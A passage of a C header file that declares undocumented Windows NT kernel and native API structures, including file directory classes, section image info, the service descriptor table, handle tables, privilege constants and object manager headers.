LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER EndOfFile;\n    LARGE_INTEGER AllocationSize;\n    ULONG FileAttributes;\n    ULONG FileNameLength;\n    ULONG EaSize;\n    WCHAR FileName[1];\n} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_FULL_DIR_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG FileIndex;\n    LARGE_INTEGER CreationTime;\n    LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER EndOfFile;\n    LARGE_INTEGER AllocationSize;\n    ULONG FileAttributes;\n    ULONG FileNameLength;\n    ULONG EaSize;\n    LARGE_INTEGER FileId;\n    WCHAR FileName[1];\n} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;\n\ntypedef struct _FILE_BOTH_DIR_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG FileIndex;\n    LARGE_INTEGER CreationTime;\n    LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER EndOfFile;\n    LARGE_INTEGER AllocationSize;\n    ULONG FileAttributes;\n    ULONG FileNameLength;\n    ULONG EaSize;\n    CCHAR ShortNameLength;\n    WCHAR ShortName[12];\n    WCHAR FileName[1];\n} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_ID_BOTH_DIR_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG FileIndex;\n    LARGE_INTEGER CreationTime;\n    LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER EndOfFile;\n    LARGE_INTEGER AllocationSize;\n    ULONG FileAttributes;\n    ULONG FileNameLength;\n    ULONG EaSize;\n    CCHAR ShortNameLength;\n    WCHAR ShortName[12];\n    LARGE_INTEGER FileId;\n    WCHAR FileName[1];\n} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;\n\ntypedef struct _FILE_NAMES_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG FileIndex;\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} 
FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;\n\ntypedef struct _FILE_OBJECTID_INFORMATION {\n    LONGLONG FileReference;\n    UCHAR ObjectId[16];\n    union {\n        struct {\n            UCHAR BirthVolumeId[16];\n            UCHAR BirthObjectId[16];\n            UCHAR DomainId[16];\n        };\n        UCHAR ExtendedInfo[48];\n    };\n} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;\n\ntypedef struct _FILE_FS_VOLUME_INFORMATION {\n    LARGE_INTEGER VolumeCreationTime;\n    ULONG         VolumeSerialNumber;\n    ULONG         VolumeLabelLength;\n    BOOLEAN       SupportsObjects;\n    WCHAR         VolumeLabel[1];\n} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;\n\ntypedef struct _FILE_ID_GLOBAL_TX_DIR_INFORMATION\n{\n    ULONG NextEntryOffset;\n    ULONG FileIndex;\n    LARGE_INTEGER CreationTime;\n    LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER EndOfFile;\n    LARGE_INTEGER AllocationSize;\n    ULONG FileAttributes;\n    ULONG FileNameLength;\n    LARGE_INTEGER FileId;\n    GUID LockingTransactionId;\n    ULONG TxInfoFlags;\n    WCHAR FileName[1];\n} FILE_ID_GLOBAL_TX_DIR_INFORMATION, *PFILE_ID_GLOBAL_TX_DIR_INFORMATION;\n\n/*\n** File END\n*/\n\n/*\n** Section START\n*/\n\ntypedef enum _SECTION_INFORMATION_CLASS {\n    SectionBasicInformation,\n    SectionImageInformation,\n    SectionRelocationInformation,\n    SectionOriginalBaseInformation,\n    SectionInternalImageInformation,\n    MaxSectionInfoClass\n} SECTION_INFORMATION_CLASS;\n\ntypedef struct _SECTION_BASIC_INFO {\n    PVOID BaseAddress;\n    ULONG AllocationAttributes;\n    LARGE_INTEGER MaximumSize;\n} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION {\n    PVOID TransferAddress;\n    ULONG ZeroBits;\n    SIZE_T MaximumStackSize;\n    SIZE_T CommittedStackSize;\n    ULONG SubSystemType;\n    union {\n        struct {\n            USHORT 
SubSystemMinorVersion;\n            USHORT SubSystemMajorVersion;\n        };\n        ULONG SubSystemVersion;\n    };\n    union\n    {\n        struct\n        {\n            USHORT MajorOperatingSystemVersion;\n            USHORT MinorOperatingSystemVersion;\n        };\n        ULONG OperatingSystemVersion;\n    };\n    USHORT ImageCharacteristics;\n    USHORT DllCharacteristics;\n    USHORT Machine;\n    BOOLEAN ImageContainsCode;\n    union\n    {\n        UCHAR ImageFlags;\n        struct\n        {\n            UCHAR ComPlusNativeReady : 1;\n            UCHAR ComPlusILOnly : 1;\n            UCHAR ImageDynamicallyRelocated : 1;\n            UCHAR ImageMappedFlat : 1;\n            UCHAR BaseBelow4gb : 1;\n            UCHAR ComPlusPrefer32bit : 1;\n            UCHAR Reserved : 2;\n        };\n    };\n    ULONG LoaderFlags;\n    ULONG ImageFileSize;\n    ULONG CheckSum;\n} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;\n\ntypedef struct _MI_EXTRA_IMAGE_INFORMATION {\n    ULONG SizeOfHeaders;\n    ULONG SizeOfImage;\n} MI_EXTRA_IMAGE_INFORMATION, *PMI_EXTRA_IMAGE_INFORMATION;\n\ntypedef struct _MI_SECTION_IMAGE_INFORMATION {\n    SECTION_IMAGE_INFORMATION ExportedImageInformation;\n    MI_EXTRA_IMAGE_INFORMATION InternalImageInformation;\n} MI_SECTION_IMAGE_INFORMATION, *PMI_SECTION_IMAGE_INFORMATION;\n\ntypedef struct _SECTION_IMAGE_INFORMATION64 {\n    ULONGLONG TransferAddress;\n    ULONG ZeroBits;\n    ULONGLONG MaximumStackSize;\n    ULONGLONG CommittedStackSize;\n    ULONG SubSystemType;\n    union {\n        struct {\n            USHORT SubSystemMinorVersion;\n            USHORT SubSystemMajorVersion;\n        };\n        ULONG SubSystemVersion;\n    };\n    union\n    {\n        struct\n        {\n            USHORT MajorOperatingSystemVersion;\n            USHORT MinorOperatingSystemVersion;\n        };\n        ULONG OperatingSystemVersion;\n    };\n    USHORT ImageCharacteristics;\n    USHORT DllCharacteristics;\n    USHORT Machine;\n    
BOOLEAN ImageContainsCode;\n    union\n    {\n        UCHAR ImageFlags;\n        struct\n        {\n            UCHAR ComPlusNativeReady : 1;\n            UCHAR ComPlusILOnly : 1;\n            UCHAR ImageDynamicallyRelocated : 1;\n            UCHAR ImageMappedFlat : 1;\n            UCHAR BaseBelow4gb : 1;\n            UCHAR ComPlusPrefer32bit : 1;\n            UCHAR Reserved : 2;\n        };\n    };\n    ULONG LoaderFlags;\n    ULONG ImageFileSize;\n    ULONG CheckSum;\n} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;\n\ntypedef struct _SECTION_INTERNAL_IMAGE_INFORMATION {\n    SECTION_IMAGE_INFORMATION SectionInformation;\n    union\n    {\n        ULONG ExtendedFlags;\n        struct\n        {\n            ULONG ImageExportSuppressionEnabled : 1;\n            ULONG ImageCetShadowStacksReady : 1; // 20H1\n            ULONG ImageXfgEnabled : 1; // 20H2\n            ULONG ImageCetShadowStacksStrictMode : 1;\n            ULONG ImageCetSetContextIpValidationRelaxedMode : 1;\n            ULONG ImageCetDynamicApisAllowInProc : 1;\n            ULONG ImageCetDowngradeReserved1 : 1;\n            ULONG ImageCetDowngradeReserved2 : 1;\n            ULONG Reserved : 24;\n        };\n    };\n} SECTION_INTERNAL_IMAGE_INFORMATION, * PSECTION_INTERNAL_IMAGE_INFORMATION;\n\ntypedef enum _SECTION_INHERIT {\n    ViewShare = 1,\n    ViewUnmap = 2\n} SECTION_INHERIT;\n\n#ifndef SEC_BASED\n#define SEC_BASED          0x200000\n#endif\n\n#ifndef SEC_NO_CHANGE\n#define SEC_NO_CHANGE      0x400000\n#endif\n\n#ifndef SEC_FILE\n#define SEC_FILE           0x800000     \n#endif\n\n#ifndef SEC_IMAGE\n#define SEC_IMAGE         0x1000000     \n#endif\n\n#ifndef SEC_RESERVE\n#define SEC_RESERVE       0x4000000     \n#endif\n\n#ifndef SEC_COMMIT\n#define SEC_COMMIT        0x8000000     \n#endif\n\n#ifndef SEC_NOCACHE\n#define SEC_NOCACHE      0x10000000     \n#endif\n\n#ifndef SEC_GLOBAL\n#define SEC_GLOBAL       0x20000000\n#endif\n\n#ifndef SEC_LARGE_PAGES\n#define SEC_LARGE_PAGES  
0x80000000    \n#endif\n\n/*\n** Section END\n*/\n\n/*\n** System Table START\n*/\n#define NUMBER_SERVICE_TABLES 2\n#define NTOS_SERVICE_INDEX   0\n#define WIN32K_SERVICE_INDEX 1\n#define SERVICE_NUMBER_MASK ((1 << 12) -  1)\n\n#if defined(_WIN64)\n\n#if defined(_AMD64_)\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 5)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5)\n\n#endif\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#endif\n\ntypedef struct _KSERVICE_TABLE_DESCRIPTOR {\n    ULONG_PTR Base; //e.g. KiServiceTable\n    PULONG Count;\n    ULONG Limit;//e.g. KiServiceLimit\n    PUCHAR Number; //e.g. KiArgumentTable\n} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;\n/*\n** System Table END\n*/\n\n/*\n** System Boot Environment START\n*/\n\n// Size=20\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 {\n    GUID BootIdentifier;\n    FIRMWARE_TYPE FirmwareType;\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;\n\n// Size=32\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION {\n    GUID BootIdentifier;\n    FIRMWARE_TYPE FirmwareType;\n    union\n    {\n        ULONGLONG BootFlags;\n        struct\n        {\n            ULONGLONG DbgMenuOsSelection : 1; // RS4\n            ULONGLONG DbgHiberBoot : 1;\n            ULONGLONG DbgSoftBoot : 1;\n            ULONGLONG DbgMeasuredLaunch : 1;\n            ULONGLONG DbgMeasuredLaunchCapable : 1; // 19H1\n            ULONGLONG DbgSystemHiveReplace : 1;\n            ULONGLONG DbgMeasuredLaunchSmmProtections : 1;\n            ULONGLONG DbgMeasuredLaunchSmmLevel : 7; // 20H1\n        };\n    };\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, 
*PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;\n\n/*\n** System Boot Environment END\n*/\n\n/*\n** Key START\n*/\n\ntypedef enum _KEY_INFORMATION_CLASS {\n    KeyBasicInformation,\n    KeyNodeInformation,\n    KeyFullInformation,\n    KeyNameInformation,\n    KeyCachedInformation,\n    KeyFlagsInformation,\n    KeyVirtualizationInformation,\n    KeyHandleTagsInformation,\n    KeyTrustInformation,\n    KeyLayerInformation,\n    MaxKeyInfoClass\n} KEY_INFORMATION_CLASS;\n\ntypedef enum _KEY_SET_INFORMATION_CLASS {\n    KeyWriteTimeInformation,\n    KeyWow64FlagsInformation,\n    KeyControlFlagsInformation,\n    KeySetVirtualizationInformation,\n    KeySetDebugInformation,\n    KeySetHandleTagsInformation,\n    KeySetLayerInformation,\n    MaxKeySetInfoClass\n} KEY_SET_INFORMATION_CLASS;\n\ntypedef struct _KEY_FULL_INFORMATION {\n    LARGE_INTEGER LastWriteTime;\n    ULONG   TitleIndex;\n    ULONG   ClassOffset;\n    ULONG   ClassLength;\n    ULONG   SubKeys;\n    ULONG   MaxNameLen;\n    ULONG   MaxClassLen;\n    ULONG   Values;\n    ULONG   MaxValueNameLen;\n    ULONG   MaxValueDataLen;\n    WCHAR   Class[1];\n} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;\n\ntypedef struct _KEY_BASIC_INFORMATION {\n    LARGE_INTEGER LastWriteTime;\n    ULONG TitleIndex;\n    ULONG NameLength;\n    WCHAR Name[1];\n} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;\n\ntypedef enum _KEY_VALUE_INFORMATION_CLASS {\n    KeyValueBasicInformation,\n    KeyValueFullInformation,\n    KeyValuePartialInformation,\n    KeyValueFullInformationAlign64,\n    KeyValuePartialInformationAlign64,\n    KeyValueLayerInformation,\n    MaxKeyValueInfoClass\n} KEY_VALUE_INFORMATION_CLASS;\n\ntypedef struct _KEY_VALUE_BASIC_INFORMATION {\n    ULONG   TitleIndex;\n    ULONG   Type;\n    ULONG   NameLength;\n    WCHAR   Name[1];            // Variable size\n} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;\n\ntypedef struct _KEY_VALUE_FULL_INFORMATION {\n    ULONG   TitleIndex;\n    ULONG   Type;\n    
ULONG   DataOffset;\n    ULONG   DataLength;\n    ULONG   NameLength;\n    WCHAR   Name[1];            // Variable size\n    //          Data[1];            // Variable size data not declared\n} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;\n\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION {\n    ULONG   TitleIndex;\n    ULONG   Type;\n    ULONG   DataLength;\n    UCHAR   Data[1];            // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;\n\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {\n    ULONG   Type;\n    ULONG   DataLength;\n    UCHAR   Data[1];            // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;\n\ntypedef struct _KEY_VALUE_ENTRY {\n    PUNICODE_STRING ValueName;\n    ULONG           DataLength;\n    ULONG           DataOffset;\n    ULONG           Type;\n} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;\n\n/*\n** Key END\n*/\n\n\n/*\n** TIME_FIELDS START\n*/\n\ntypedef struct _TIME_FIELDS {\n    CSHORT Year;        // range [1601...]\n    CSHORT Month;       // range [1..12]\n    CSHORT Day;         // range [1..31]\n    CSHORT Hour;        // range [0..23]\n    CSHORT Minute;      // range [0..59]\n    CSHORT Second;      // range [0..59]\n    CSHORT Milliseconds;// range [0..999]\n    CSHORT Weekday;     // range [0..6] == [Sunday..Saturday]\n} TIME_FIELDS;\ntypedef TIME_FIELDS *PTIME_FIELDS;\n\n/*\n** TIME_FIELDS END\n*/\n\n/*\n** HANDLE START\n*/\n\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {\n    USHORT UniqueProcessId;\n    USHORT CreatorBackTraceIndex;\n    UCHAR ObjectTypeIndex;\n    UCHAR HandleAttributes;\n    USHORT HandleValue;\n    PVOID Object;\n    ULONG GrantedAccess;\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\n\ntypedef struct _SYSTEM_HANDLE_INFORMATION {\n    ULONG NumberOfHandles;\n    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];\n} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;\n\ntypedef struct 
_SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {\n    PVOID Object;\n    ULONG_PTR UniqueProcessId;\n    ULONG_PTR HandleValue;\n    ULONG GrantedAccess;\n    USHORT CreatorBackTraceIndex;\n    USHORT ObjectTypeIndex;\n    ULONG HandleAttributes;\n    ULONG Reserved;\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;\n\ntypedef struct _SYSTEM_HANDLE_INFORMATION_EX {\n    ULONG_PTR NumberOfHandles;\n    ULONG_PTR Reserved;\n    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];\n} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;\n\n/*\n** HANDLE END\n*/\n\n// Privileges\n\n#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)\n#define SE_CREATE_TOKEN_PRIVILEGE (2L)\n#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)\n#define SE_LOCK_MEMORY_PRIVILEGE (4L)\n#define SE_INCREASE_QUOTA_PRIVILEGE (5L)\n#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)\n#define SE_TCB_PRIVILEGE (7L)\n#define SE_SECURITY_PRIVILEGE (8L)\n#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)\n#define SE_LOAD_DRIVER_PRIVILEGE (10L)\n#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)\n#define SE_SYSTEMTIME_PRIVILEGE (12L)\n#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)\n#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)\n#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)\n#define SE_CREATE_PERMANENT_PRIVILEGE (16L)\n#define SE_BACKUP_PRIVILEGE (17L)\n#define SE_RESTORE_PRIVILEGE (18L)\n#define SE_SHUTDOWN_PRIVILEGE (19L)\n#define SE_DEBUG_PRIVILEGE (20L)\n#define SE_AUDIT_PRIVILEGE (21L)\n#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)\n#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)\n#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)\n#define SE_UNDOCK_PRIVILEGE (25L)\n#define SE_SYNC_AGENT_PRIVILEGE (26L)\n#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)\n#define SE_MANAGE_VOLUME_PRIVILEGE (28L)\n#define SE_IMPERSONATE_PRIVILEGE (29L)\n#define SE_CREATE_GLOBAL_PRIVILEGE (30L)\n#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)\n#define SE_RELABEL_PRIVILEGE (32L)\n#define SE_INC_WORKING_SET_PRIVILEGE (33L)\n#define SE_TIME_ZONE_PRIVILEGE (34L)\n#define 
SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)\n#define SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE (36L)\n#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE\n\n//\n// Generic test for success on any status value (non-negative numbers\n// indicate success).\n//\n\n#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)\n\n//\n// Generic test for information on any status value.\n//\n\n#define NT_INFORMATION(Status) ((ULONG)(Status) >> 30 == 1)\n\n//\n// Generic test for warning on any status value.\n//\n\n#define NT_WARNING(Status) ((ULONG)(Status) >> 30 == 2)\n\n//\n// Generic test for error on any status value.\n//\n\n#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)\n\n\n/*\n** OBJECT MANAGER START\n*/\n\n//\n// Header flags\n//\n\n#define OB_FLAG_NEW_OBJECT              0x01\n#define OB_FLAG_KERNEL_OBJECT           0x02\n#define OB_FLAG_CREATOR_INFO            0x04\n#define OB_FLAG_EXCLUSIVE_OBJECT        0x08\n#define OB_FLAG_PERMANENT_OBJECT        0x10\n#define OB_FLAG_DEFAULT_SECURITY_QUOTA  0x20\n#define OB_FLAG_SINGLE_HANDLE_ENTRY     0x40\n#define OB_FLAG_DELETED_INLINE          0x80\n\n//\n// InfoMask values\n//\n\n#define OB_INFOMASK_PROCESS_INFO    0x10\n#define OB_INFOMASK_QUOTA           0x08\n#define OB_INFOMASK_HANDLE          0x04\n#define OB_INFOMASK_NAME            0x02\n#define OB_INFOMASK_CREATOR_INFO    0x01\n\n#define OBJ_INVALID_SESSION_ID 0xFFFFFFFF\n#define NUMBER_HASH_BUCKETS 37\n\ntypedef struct _OBJECT_DIRECTORY_ENTRY {\n    PVOID ChainLink;\n    PVOID Object;\n    ULONG HashValue;\n} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;\n\ntypedef struct _EX_PUSH_LOCK {\n    union {\n        struct {\n            ULONG_PTR Locked : 1;\n            ULONG_PTR Waiting : 1;\n            ULONG_PTR Waking : 1;\n            ULONG_PTR MultipleShared : 1;\n            ULONG_PTR Shared : sizeof(ULONG_PTR) * 8 - 4;\n        };\n        ULONG_PTR Value;\n        PVOID Ptr;\n    };\n} EX_PUSH_LOCK, 
*PEX_PUSH_LOCK;\n\ntypedef struct _EX_PUSH_LOCK_AUTO_EXPAND_STATE {\n    union {\n        struct {\n            ULONG Expanded : 1;\n            ULONG Transitioning : 1;\n            ULONG Pageable : 1;\n        };\n        ULONG Value;\n    };\n} EX_PUSH_LOCK_AUTO_EXPAND_STATE, *PEX_PUSH_LOCK_AUTO_EXPAND_STATE; /* size: 0x0004 */\n\ntypedef struct _EX_PUSH_LOCK_AUTO_EXPAND {\n    EX_PUSH_LOCK LocalLock;\n    EX_PUSH_LOCK_AUTO_EXPAND_STATE State;\n    ULONG Stats;\n} EX_PUSH_LOCK_AUTO_EXPAND, *PEX_PUSH_LOCK_AUTO_EXPAND; /* size: 0x0010 */\n\ntypedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {\n    LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n    EX_PUSH_LOCK Lock;\n    ULONG NumberOfPrivateSpaces;\n} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE;\n\ntypedef struct _OBJECT_NAMESPACE_ENTRY {\n    LIST_ENTRY ListEntry;\n    PVOID NamespaceRootDirectory;\n    ULONG SizeOfBoundaryInformation;\n    ULONG Reserved;\n    UCHAR HashValue;\n    ULONG_PTR Alignment;\n} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY;\n\ntypedef enum _BOUNDARY_ENTRY_TYPE {\n    OBNS_Invalid = 0,\n    OBNS_Name = 1,\n    OBNS_SID = 2,\n    OBNS_IntegrityLabel = 3\n} BOUNDARY_ENTRY_TYPE;\n\ntypedef struct _OBJECT_BOUNDARY_ENTRY {\n    BOUNDARY_ENTRY_TYPE EntryType;\n    ULONG EntrySize;\n} OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY;\n\ntypedef struct _OBJECT_BOUNDARY_DESCRIPTOR {\n    ULONG Version;\n    ULONG Items;\n    ULONG TotalSize;\n    ULONG Reserved;\n} OBJECT_BOUNDARY_DESCRIPTOR, *POBJECT_BOUNDARY_DESCRIPTOR;\n\ntypedef struct _OBJECT_DIRECTORY {\n    POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n    EX_PUSH_LOCK Lock;\n    PDEVICE_MAP DeviceMap;\n    ULONG SessionId;\n    PVOID NamespaceEntry;\n    ULONG Flags;\n} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;\n\ntypedef struct _OBJECT_DIRECTORY_V2 {\n    POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n    EX_PUSH_LOCK Lock;\n    PDEVICE_MAP DeviceMap;\n    POBJECT_DIRECTORY ShadowDirectory;\n    ULONG 
SessionId;\n    PVOID NamespaceEntry;\n    ULONG Flags;\n    LONG Padding[1];\n} OBJECT_DIRECTORY_V2, *POBJECT_DIRECTORY_V2;\n\ntypedef struct _OBJECT_DIRECTORY_V3 {\n    POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];\n    EX_PUSH_LOCK Lock;\n    PDEVICE_MAP DeviceMap;\n    POBJECT_DIRECTORY ShadowDirectory;\n    PVOID NamespaceEntry;\n    PVOID SessionObject;\n    ULONG Flags;\n    ULONG SessionId;\n} OBJECT_DIRECTORY_V3, *POBJECT_DIRECTORY_V3;\n\ntypedef struct _OBJECT_HEADER_NAME_INFO {\n    POBJECT_DIRECTORY Directory;\n    UNICODE_STRING Name;\n    ULONG QueryReferences;\n} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;\n\ntypedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32\n    LIST_ENTRY TypeList; // Size=16 Offset=0\n    PVOID CreatorUniqueProcess; // Size=8 Offset=16\n    USHORT CreatorBackTraceIndex; // Size=2 Offset=24\n    USHORT Reserved; // Size=2 Offset=26\n} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;\n\ntypedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16\n    PVOID Process; // Size=8 Offset=0\n    struct\n    {\n        unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24\n        unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8\n    };\n} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;\n\ntypedef struct _OBJECT_HEADER_HANDLE_INFO { // Size=16\n    union {\n        PVOID HandleCountDataBase; // Size=8 Offset=0\n        struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0\n    };\n} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;\n\ntypedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16\n    PVOID ExclusiveProcess; // Size=8 Offset=0\n    PVOID Reserved; // Size=8 Offset=8\n} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;\n\ntypedef struct _OBJECT_HEADER_QUOTA_INFO {\n    ULONG PagedPoolCharge; //4\n    ULONG NonPagedPoolCharge; //4 \n    ULONG SecurityDescriptorCharge; //4\n    PVOID SecurityDescriptorQuotaBlock; 
//sizeof(pointer)\n    unsigned __int64 Reserved; //sizeof(uint64)\n} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;\n\ntypedef struct _OBJECT_HEADER_PADDING_INFO {\n    ULONG PaddingAmount;\n} OBJECT_HEADER_PADDING_INFO, *POBJECT_HEADER_PADDING_INFO;\n\ntypedef struct _OBJECT_HEADER_AUDIT_INFO {\n    PVOID SecurityDescriptor;\n    PVOID Reserved;\n} OBJECT_HEADER_AUDIT_INFO, *POBJECT_HEADER_AUDIT_INFO;\n\ntypedef struct _OBJECT_HEADER_EXTENDED_INFO {\n    struct _OBJECT_FOOTER *Footer;\n    PVOID Reserved;\n} OBJECT_HEADER_EXTENDED_INFO, *POBJECT_HEADER_EXTENDED_INFO;\n\ntypedef struct _OB_HANDLE_REVOCATION_BLOCK\n{\n    LIST_ENTRY RevocationInfos;\n    struct _EX_PUSH_LOCK Lock;\n    struct _EX_RUNDOWN_REF Rundown;\n} OB_HANDLE_REVOCATION_BLOCK, *POB_HANDLE_REVOCATION_BLOCK;\n\ntypedef struct _OBJECT_HEADER_HANDLE_REVOCATION_INFO {\n    LIST_ENTRY ListEntry;\n    OB_HANDLE_REVOCATION_BLOCK* RevocationBlock;\n    unsigned char Padding1[4];\n    unsigned char Padding2[4];\n} OBJECT_HEADER_HANDLE_REVOCATION_INFO, *POBJECT_HEADER_HANDLE_REVOCATION_INFO;\n\ntypedef struct _QUAD {\n    union {\n        INT64 UseThisFieldToCopy;\n        float DoNotUseThisField;\n    };\n} QUAD, *PQUAD;\n\ntypedef struct _OBJECT_CREATE_INFORMATION {\n    ULONG Attributes;\n    PVOID RootDirectory;\n    CHAR ProbeMode;\n    ULONG PagedPoolCharge;\n    ULONG NonPagedPoolCharge;\n    ULONG SecurityDescriptorCharge;\n    PVOID SecurityDescriptor;\n    PSECURITY_QUALITY_OF_SERVICE SecurityQos;\n    SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;\n} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;\n\ntypedef struct _SECURITY_CLIENT_CONTEXT {\n    struct _SECURITY_QUALITY_OF_SERVICE SecurityQos;\n    void* ClientToken;\n    UCHAR DirectlyAccessClientToken;\n    UCHAR DirectAccessEffectiveOnly;\n    UCHAR ServerIsRemote;\n    struct _TOKEN_CONTROL ClientTokenControl;\n    LONG __PADDING__[1];\n} SECURITY_CLIENT_CONTEXT, *PSECURITY_CLIENT_CONTEXT;\n\ntypedef enum _POOL_TYPE 
